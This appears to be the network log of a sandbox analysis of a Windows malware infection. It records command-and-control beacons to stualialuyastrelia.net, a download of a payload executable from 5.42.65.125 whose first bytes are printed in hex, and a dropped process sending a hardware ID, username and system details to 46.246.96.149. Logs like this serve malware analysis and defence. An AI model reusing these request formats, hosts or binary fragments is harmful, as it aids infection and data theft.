Dec 24, 2023 10:44:31.019989014 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:31.043431044 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jlxpegwxlks.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:31.334064960 CET	257	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 48 db 45 83 1a 84 a3 4e f2 7b a4 65 17 01 6f f3 32 53 66 8e 5b 78 53 2e 80 af d0 ee 87 77 9d 62 2c 09 69 e1 b4 ed a7 58 3e 9a 75 2d b9 d4 cd 6c f0 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 45Uys/~(`:HEN{eo2Sf[xS.wb,iX>u-lU0
Dec 24, 2023 10:44:35.951535940 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://reuyvyhuqyymkw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:36.242547989 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:36.266953945 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://txabenbdofjrq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:36.560221910 CET	234	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 65 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1b 81 01 c7 5b cb f7 07 a6 3b bf 29 46 16 31 e4 76 4b 6d 82 5c 2c 13 37 c1 a5 94 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eUys/~(`:[;)F1vKm\,70
Dec 24, 2023 10:44:42.509581089 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uafjypcuequr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:42.800369024 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:42.807508945 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jurxcotwbxdk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:43.100126028 CET	241	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 87 14 d0 59 9c fe 09 b7 3a e5 3f 57 5b 38 be 65 0b 69 c3 57 3b 0f 7c c3 e2 90 a9 d6 71 8a 63 32 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35Uys/~(`:Y:?W[8eiW;\|qc2]0
Dec 24, 2023 10:44:46.380913019 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hyyvucskxnak.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:46.673041105 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49724	5.42.65.125	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:31.677228928 CET	187	OUT	GET /288c47bbc1871b42239df19ff4df68f076.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 5.42.65.125
Dec 24, 2023 10:44:31.920002937 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:31 GMT Content-Type: application/octet-stream Content-Length: 7079936 Last-Modified: Sat, 23 Dec 2023 16:28:02 GMT Connection: keep-alive ETag: "65870a92-6c0800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 0a 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 fe 6b 00 00 08 00 00 00 00 00 00 ae 1d 6c 00 00 20 00 00 00 20 6c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 6c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 1d 6c 00 57 00 00 00 00 20 6c 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 6c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 fd 6b 00 00 20 00 00 00 fe 6b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 05 00 00 00 20 6c 00 00 06 00 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 6c 00 00 02 00 00 00 06 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 1d 6c 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 07 6c 00 d8 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 a3 df 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELekl l@ `l@TlW lH@l H.textk k `.rsrcH ll@@.reloc@ll@BlH\|l'k0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Dec 24, 2023 10:44:31.920064926 CET	1286	IN	Data Raw: 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a 0e Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}{
Dec 24, 2023 10:44:31.920140982 CET	1286	IN	Data Raw: dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 02 00 0b 00 b3 be 00 0a 00 00 00 00 13 30 01 00 18 00 00 00 0c 00 00 11 72 4d 02 00 70 28 12 00 00 06 0a 12 00 28 49 00 00 0a 2c 02 17 Data Ascii: (0rMp((I,0(JoK(&06(L(M((L(MYj/&//(!klSystem.Re
Dec 24, 2023 10:44:31.920219898 CET	1286	IN	Data Raw: 00 68 00 77 00 76 00 77 00 79 00 31 00 64 00 65 00 73 00 75 00 71 00 68 00 77 00 76 00 77 00 79 00 31 00 64 00 65 00 73 00 75 00 71 00 68 00 77 00 76 00 77 00 79 00 31 00 64 00 65 00 73 00 75 00 71 00 68 00 77 00 76 00 77 00 79 00 31 00 64 00 65 Data Ascii: hwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuqhwvwy1desuq
Dec 24, 2023 10:44:31.920316935 CET	1286	IN	Data Raw: c3 ba ff 31 8b 89 8d 36 0c 25 ff 04 08 80 fb 68 00 76 59 2e 5d ba 8b ce 55 ef ec e8 45 63 50 8a 75 7d ff 1d 08 9f c6 69 00 77 83 bd 0c 6c c3 ef ff 30 8b 9f 8d 30 10 21 ff 1d 0c 88 75 7e e8 91 1f 79 00 b2 c4 68 5d a6 8b 8c 55 fe ec 20 83 0d fc 77 Data Ascii: 16%hvY.]UEcPu}iwl00!u~yh]U wVEPu="PuNEt"e~uw;ojihMw339>;un qav!V/Vgea8UwP/$d<YuugZ1PUmE-y
Dec 24, 2023 10:44:31.920399904 CET	1286	IN	Data Raw: ff 04 10 97 75 7b ff 03 08 9f 5d 86 ff ce 83 a0 14 38 c3 f8 ff 20 8b 9d 53 5b db 4e 5d 62 75 57 e8 a8 18 31 00 37 53 36 53 20 c7 75 16 71 00 68 e8 49 18 76 00 f4 c4 6d 83 f9 ff 8d dc 65 00 73 56 fe 75 79 57 51 5d 67 75 66 3b 84 75 69 39 6c 0c 11 Data Ascii: u{]8 S[N]buW17S6S uqhIvmesVuyWQ]guf;ui9lVuq;tpL\|esuqw\|oyDu}N}avEO37P/hpu$u=8y8Fu6u8b!VA@19@ifLu`Lu~ju8JuByw,W^)
Dec 24, 2023 10:44:31.920481920 CET	1286	IN	Data Raw: 82 79 e8 55 7c 64 00 ee f8 8c 35 79 88 f3 00 80 57 0b 00 76 83 b3 0c 40 7d d5 75 61 39 20 e0 07 0e fc 7d 95 89 15 d8 fe 45 96 8b 87 89 0c dc ba 7d bc eb fa 68 13 f2 f4 00 c9 54 9a 81 77 e8 91 fd 88 ff 20 68 59 f2 e5 00 dd 64 81 81 75 e8 a6 fd 97 Data Ascii: yU\|d5yWv@}ua9 }E}hTw hYdu.3deuuYuP$vj1=3C}feYqUul}]Uul}]jvjvjwiV\|sVwV5
Dec 24, 2023 10:44:31.920572996 CET	1286	IN	Data Raw: c8 55 89 37 0c eb c8 88 eb 0f 8b 3a 0c fa f9 ce 74 7f 83 9c fe 07 16 fe c1 f2 e0 77 8b a6 c1 8c 05 b6 e0 7f 03 35 95 84 76 e7 00 98 05 cd 28 47 82 68 f6 37 04 56 74 63 6a 7b 53 62 51 8c 25 f2 00 73 23 b7 83 b5 10 eb f8 88 74 53 8b 31 08 f3 4d 39 Data Ascii: U7:tw5v(Gh7Vtcj{SbQ%s#tS1M9ls3G"48MyE9Nd <de_(^=3!wdu:yqF>lHY*H<;HAucsFl;rLwtow;Hu`vF}w@
Dec 24, 2023 10:44:31.920646906 CET	1286	IN	Data Raw: d8 8a ff 86 e8 6d c0 64 00 ef 03 30 89 e8 c4 8c ff 97 84 b7 0f f2 a4 8b ff 86 8b bc b4 99 ff 9a 8d c6 d8 88 ff 8e e8 52 c0 77 00 9f 4d 70 00 79 0f 8f c2 e7 f8 01 0f fc e8 74 00 71 0f ec 79 75 00 76 83 8f 53 76 8f c3 00 64 00 6a 84 f3 00 75 00 f2 Data Ascii: md0RwMpytqyuvSvdju)tgH>t/H1t9H,vu vy(9esvydwhtw0msqhq1eXwdeus
Dec 24, 2023 10:44:31.920711994 CET	1286	IN	Data Raw: ff 72 00 75 00 9a 1a eb a5 87 fd 89 ff 80 b8 79 02 31 00 5d 85 8d fd 8c ff 0b 06 f8 85 80 fd 88 ff fd c7 7c c3 0c 06 10 85 b4 fd 9a ff fe 75 86 8b f4 e8 95 ff 88 ff fb e8 8a ff 86 85 f1 7f 62 8b a2 0b b0 74 58 8b f4 e0 95 ff 88 99 24 50 24 57 91 Data Ascii: ruy1]\|ubtX$P$WId0L~}NE+F1da9Ut%x0qZI9Cts@1;u+L;uxe0,K1;u+
Dec 24, 2023 10:44:32.162657976 CET	1286	IN	Data Raw: 55 fd ec 21 e8 9b ff ce ff ef 4d 6d 51 fa 08 9d 82 8e ff 97 59 fc f0 9e bc 88 ff 86 89 01 5e 39 c3 ee ff 26 8b 99 e8 49 6a 68 00 f2 c0 03 05 1d 0c 21 5d f2 e8 fb ff 9a ff f8 4d 7d 89 79 33 a8 5d b4 8b 89 55 fc ec 2f 8b 44 08 57 c0 5e f0 06 12 25 Data Ascii: U!MmQY^9&Ijh!]M}y3]U/DW^%P!P8mj'Xpqn3^+,ie0]M9l3]U>ELaP4P5\|jaX3dc3^(= $39lS"S;S`wo?-L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49725	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:35.200381041 CET	214	OUT	POST /connect HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 48 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2
Dec 24, 2023 10:44:35.575227976 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:35 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=e27foe89ms7fvj98u7srrpipql; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49728	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:39.227451086 CET	484	OUT	POST /osinfo HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 318 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6f 73 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 2d 62 69 74 26 6c 61 6e 67 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 26 6c 61 6e 67 73 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 26 6e 61 6d 65 3d 68 61 72 64 7a 26 61 64 6d 69 6e 3d 46 61 6c 73 65 26 63 70 75 3d 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 34 20 43 6f 72 65 73 26 73 69 7a 65 78 3d 31 32 38 30 26 73 69 7a 65 79 3d 31 30 32 34 26 72 61 6d 3d 34 32 39 33 39 37 31 39 36 38 26 76 69 64 65 6f 3d 5f 33 59 32 32 45 34 20 7c 20 52 41 4d 3a 20 31 30 37 33 37 34 31 38 32 34 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&os=Microsoft Windows 10 Pro 64-bit&lang=English (United Kingdom)&langs=English (United Kingdom); English (United Kingdom); &name=hardz&admin=False&cpu=Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 4 Cores&sizex=1280&sizey=1024&ram=4293971968&video=_3Y22E4 \| RAM: 1073741824
